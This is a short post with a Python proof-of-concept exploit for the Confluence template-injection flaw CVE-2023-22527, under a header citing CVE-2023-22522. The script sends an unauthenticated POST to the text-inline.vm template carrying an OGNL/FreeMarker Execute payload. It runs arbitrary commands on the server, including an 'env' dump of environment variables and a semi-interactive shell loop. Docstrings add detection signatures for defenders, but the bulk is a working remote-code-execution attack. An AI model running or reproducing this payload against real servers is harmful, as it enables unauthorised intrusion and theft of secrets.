
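CVE-2023-22522 (примечание: в описании самого скрипта ниже указан CVE-2023-22527, Confluence SSTI — номер в заголовке, вероятно, опечатка)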

Код:
import requests
import argparse

class exploit:
	"""Proof-of-concept client for the Confluence template-injection issue
	named in this script's argparse description (CVE-2023-22527).

	Defender notes, all taken from the request built in ``rce``:
	  * the request is an unauthenticated-looking POST (no cookies or auth
	    headers are set here) to ``/template/aui/text-inline.vm``;
	  * the form body carries a ``label`` parameter with ``\\u0027``-style
	    unicode escapes and an ``x`` parameter referencing
	    ``freemarker.template.utility.Execute``.
	Those three strings are practical matching points for WAF rules and for
	access-log / proxy-log hunting. The durable mitigation is the vendor fix
	for the CVE; filtering is only a stop-gap.
	"""

	def __init__(self, url):
		# Base URL of the target; the template path is appended in rce().
		# NOTE(review): no validation here, and parse_args() allows -u to be
		# omitted, so this may be None.
		self.url = url

	def rce(self, cmd='', header='Ret-rce'):
		"""Send one crafted POST and return the leading part of the response.

		``cmd`` is concatenated into the request body as-is.
		``header`` is accepted but never used in this method.
		Returns the response text that precedes the first ``<!DOCTYPE html>``
		marker, stripped of surrounding whitespace.
		"""

		# Form body: `label` holds the escaped expression, `x` holds the
		# expression that `label` evaluates. Both parameter names and the
		# escaped-quote pattern are useful detection signatures.
		data = 'label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"'+cmd+'"}))\r\n'
		
		# Headers are set explicitly; Content-Length is derived from the
		# character count of `data`.
		r = requests.post(f'{self.url}/template/aui/text-inline.vm', data=data, headers = {
			    'Connection': 'close',
			    'Content-Type': 'application/x-www-form-urlencoded',
			    'Content-Length': str(len(data))
			}
		)
		# Keep only what comes before the HTML document in the response body;
		# presumably the injected output is written ahead of the page markup.
		return r.text.split('<!DOCTYPE html>')[0].strip()

	def get_env(self):
		"""Call rce() with the fixed command ``env`` and return its result."""
		return self.rce(cmd='env')

	def shell(self):
		"""Read lines from stdin in an endless loop, passing each to rce().

		There is no exit condition; every line typed results in one POST to
		the same endpoint, so this mode appears in server logs as a burst of
		repeated requests to the template path.
		"""
		print('[DEBUG] Spawning semi-interactive shell ..')
		while 1:
			cmd = input('$ ')
			result = self.rce(cmd)
			print(result)



def parse_args():
	"""Build the command-line parser for this script and parse ``sys.argv``.

	Options: ``-u`` (target base URL) and ``-c`` (command) are optional
	strings that default to None; ``-e`` and ``-i`` are boolean switches
	that default to False.
	"""
	cli = argparse.ArgumentParser(
		add_help=True,
		description='This is a POC for CVE-2023-22527 (Confluence SSTI)',
	)

	# NOTE(review): -u is not required, so args.url can be None downstream.
	cli.add_argument("-u", dest="url", type=str, required=False, help="Url")
	cli.add_argument("-c", dest="command", type=str, required=False, default=None, help="Command")

	# Both switches are plain store_true flags.
	switches = (
		("-e", "env", "Get environnement vars"),
		("-i", "interactive", "Interactive mod"),
	)
	for flag, target, text in switches:
		cli.add_argument(flag, dest=target, action="store_true", required=False, default=False, help=text)

	namespace = cli.parse_args()
	return namespace

def main(args):
	"""Drive the script from the parsed arguments.

	As shown on this page, only the ``-e`` switch is acted on; ``-c`` and
	``-i`` are checked for presence but never dispatched.
	"""
	nothing_selected = args.command is None and not (args.env or args.interactive)
	if nothing_selected:
		# The message is printed, but execution continues past it.
		print('[ERROR] Please provide a command using -c option')

	exp = exploit(url=args.url)

	if not args.env:
		return
	print(exp.get_env())
 

